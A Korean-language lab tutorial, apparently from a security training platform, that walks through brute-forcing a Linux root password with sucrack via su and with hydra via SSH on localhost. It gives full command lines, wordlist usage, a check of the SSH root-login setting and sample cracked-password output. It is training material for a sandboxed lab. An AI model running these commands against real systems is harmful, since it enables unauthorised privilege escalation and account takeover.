소개
이 랩에서는 Linux 시스템에 대한 무차별 대입 공격 (brute force attack) 을 통해 root 사용자 비밀번호를 얻는 두 가지 방법과 해당 도구를 살펴봅니다. 이 랩은 기본적인 원리를 이해하고 프로세스 중에 흔히 발생하는 함정을 피하는 데 도움이 될 것입니다.
sucrack 를 사용하여 su 명령을 통해 Root 비밀번호 무차별 대입 공격
이 단계에서는 sucrack 도구를 사용하여 su 명령을 통해 root 사용자의 비밀번호를 무차별 대입 공격하는 방법을 배웁니다.
su 명령은 Linux 시스템에서 다른 사용자의 ID 로 전환하는 데 사용됩니다. root 사용자를 제외한 다른 사용자는 이 명령을 사용할 때 대상 사용자의 비밀번호를 제공해야 합니다.
su 명령에 대한 무차별 대입 공격에 사용할 도구는 sucrack입니다. sucrack는 su 명령을 통해 로컬 사용자 비밀번호를 무차별 대입 공격하도록 설계된 멀티 스레드 Linux 도구입니다.
su 명령은 TTY 셸에서 사용자 입력을 필요로 하므로 간단한 셸 스크립트로는 무차별 대입 공격을 수행할 수 없습니다. sucrack는 C 언어로 작성되었으며 멀티 스레딩을 지원하여 무차별 대입 공격 프로세스를 매우 효율적으로 만듭니다.
자세한 내용은 sucrack의 공식 웹사이트를 확인하십시오.
실제 시나리오에서는 대상 시스템이 인터넷에 접속할 수 없을 수 있으므로 다음 두 가지 방법 중 하나를 사용하여 sucrack를 설치할 수 있습니다.
sucrack소스 코드를 다운로드하여 대상 시스템에 업로드한 다음 컴파일하고 실행합니다.sucrack소스 코드를 다운로드하여 로컬에서 컴파일한 다음 컴파일된 바이너리를 대상 시스템에 업로드합니다.
이 랩에서는 이미 sucrack를 설치했습니다.
무차별 대입 공격을 시도하기 전에 랩 환경을 설정합니다.
터미널을 열고 프로젝트 디렉토리로 이동합니다.
cd /home/labex/projectenv_setup_1.sh스크립트를 실행하여 랩 환경을 설정합니다../env_setup_1.sh이 스크립트는 권한이 없는
www-data사용자로 전환합니다. 우리의 목표는brute force를 통해root사용자의 비밀번호를 얻는 것입니다.데모 목적으로
/tmp/common-wordlists.txt에 미리 준비된 단어 목록이 있습니다. 자신만의 단어 목록을 사용할 수도 있습니다.sucrack를 사용하여su명령을 무차별 대입 공격하는 구문은 다음과 같습니다.sucrack -w <threads> [-u <username>] <wordlist>매개변수는 다음과 같습니다.
-w: 스레드 수를 지정합니다.<wordlist>: 단어 목록 파일을 지정합니다.-u: 무차별 대입 공격할 사용자 이름을 지정합니다. 사용자 이름을 지정하지 않으면sucrack는 기본적으로root사용자의 비밀번호를 무차별 대입 공격합니다.
다음 명령을 실행하여 무차별 대입 공격을 시도해 보겠습니다.
sucrack -w 20 /tmp/common-wordlists.txt > ~/sucrack.log && reset무차별 대입 공격의 출력은
sucrack.log파일로 리디렉션됩니다.참고:
reset명령은sucrack사용 후 터미널이 제대로 표시되지 않을 수 있으므로 터미널 화면을 지우는 데 사용됩니다.이 무차별 대입 공격은 시간이 걸릴 수 있습니다. 잠시 후
sucrack.log파일을 확인하여 비밀번호를 확인합니다.cat ~/sucrack.log예상 출력:
password is: really그런 다음 다음을 사용하여 root 사용자로 전환할 수 있습니다.
su - root비밀번호
really를 입력하여 root 사용자로 전환합니다.reallyroot 사용자로 성공적으로 전환했는지 확인하기 위해
/root디렉토리에success_1.txt라는 파일을 만듭니다.echo "Success_1" > /root/success_1.txt/root/success_1.txt파일을 확인하여 root 사용자로 성공적으로 전환했는지 확인할 수 있습니다.
sucrack를 사용하여 root 사용자의 비밀번호를 무차별 대입 공격하는 방법을 배웠습니다!
Hydra 를 사용하여 SSH 를 통해 Root 비밀번호 무차별 대입 공격
이 단계에서는 hydra 도구를 사용하여 SSH 프로토콜을 통해 root 사용자의 비밀번호를 무차별 대입 공격하는 방법을 배웁니다.
이전 단계에서 우리는 여전히 root 사용자여야 하며, 이 단계를 위해 labex 사용자로 전환해야 합니다. 다음 명령을 실행하여 labex 사용자로 전환할 수 있습니다.
su - labex
디렉토리가
/home/labex/project로 설정되어 있는지 확인합니다.cd /home/labex/projectenv_setup_2.sh스크립트를 실행하여 랩 환경을 설정합니다../env_setup_2.sh이전 단계와 마찬가지로 이 스크립트를 실행하면
www-data사용자로 전환됩니다.SSH 프로토콜을 무차별 대입 공격하기 전에 대상 시스템이 root 사용자의 SSH 로그인을 허용하는지 확인해야 합니다. 다음 명령을 실행하여 확인할 수 있습니다.
cat /etc/ssh/sshd_config | grep -i permitrootlogin출력이
PermitRootLogin이yes로 설정되어 있으면 무차별 대입 공격을 진행할 수 있습니다. 그렇지 않으면 시도할 필요가 없습니다.SSH 프로토콜을 무차별 대입 공격하는 데 사용할 도구는
hydra입니다.hydra는 RDP, SMB, HTTP, MySQL 등을 포함한 다양한 프로토콜을 지원하는 유명한 무차별 대입 공격 도구입니다.hydra는 Kali Linux 및 랩의 Ubuntu 환경에 사전 설치되어 있습니다.hydra를 사용하여 SSH 프로토콜을 무차별 대입 공격하는 구문은 다음과 같습니다.hydra -l root -P passwords.txt -t 4 -V < IP > ssh매개변수는 다음과 같습니다.
-l: 사용자 이름을 지정합니다.-P: 단어 목록 파일을 지정합니다.-t: 스레드 수를 지정합니다.-V: 무차별 대입 공격의 진행 상황과 세부 정보를 표시합니다.
/tmp/common-wordlists.txt단어 목록을 사용하여 root 사용자의 비밀번호를 무차별 대입 공격하고 출력을hydra.log파일에 저장해 보겠습니다.hydra -l root -P /tmp/common-wordlists.txt -t 64 -V 127.0.0.1 ssh > ~/hydra.log잠시 후 root 사용자의 비밀번호가 성공적으로 크래킹됩니다.
hydra.log파일을 확인하여 비밀번호를 확인합니다.cat ~/hydra.log예시 출력:
... [22][ssh] host: 127.0.0.1 login: root password: penguin 1 of 1 target successfully completed, 1 valid password found ...이제 root 사용자의 비밀번호를 얻었으므로 다음 명령을 실행하여 root 사용자로 전환할 수 있습니다.
su - root비밀번호
penguin을 입력하여 root 사용자로 전환합니다.penguin이제 root 사용자여야 합니다. 다음 명령을 실행하여 확인할 수 있습니다.
whoami출력은
root여야 합니다.root 사용자로 성공적으로 전환했는지 확인하기 위해
/root디렉토리에success_2.txt라는 파일을 만듭니다.echo "Success_2" > /root/success_2.txt/root/success_2.txt파일을 확인하여 root 사용자로 성공적으로 전환했는지 확인할 수 있습니다.
참고: v9.0 이전 버전의 hydra를 사용하는 경우 SSH 프로토콜을 무차별 대입 공격할 때 잘못된 긍정 (false positive) 을 보고할 수 있습니다. hydra -v를 실행하여 hydra 버전을 확인할 수 있습니다.
요약
이 랩에서는 Linux 시스템에서 root 사용자의 비밀번호를 무차별 대입 공격하는 두 가지 방법, 즉 sucrack 도구를 사용한 su 명령을 통한 방법과 hydra 도구를 사용한 SSH 프로토콜을 통한 방법을 배웠습니다. 각 방법의 설치, 사용법 및 단계별 절차를 다루어 기본 원리를 이해하고 일반적인 함정을 피할 수 있도록 했습니다. 이 랩은 다양한 시나리오에 적용할 수 있는 권한 상승 (privilege escalation) 기술에 대한 귀중한 실습 경험을 제공합니다.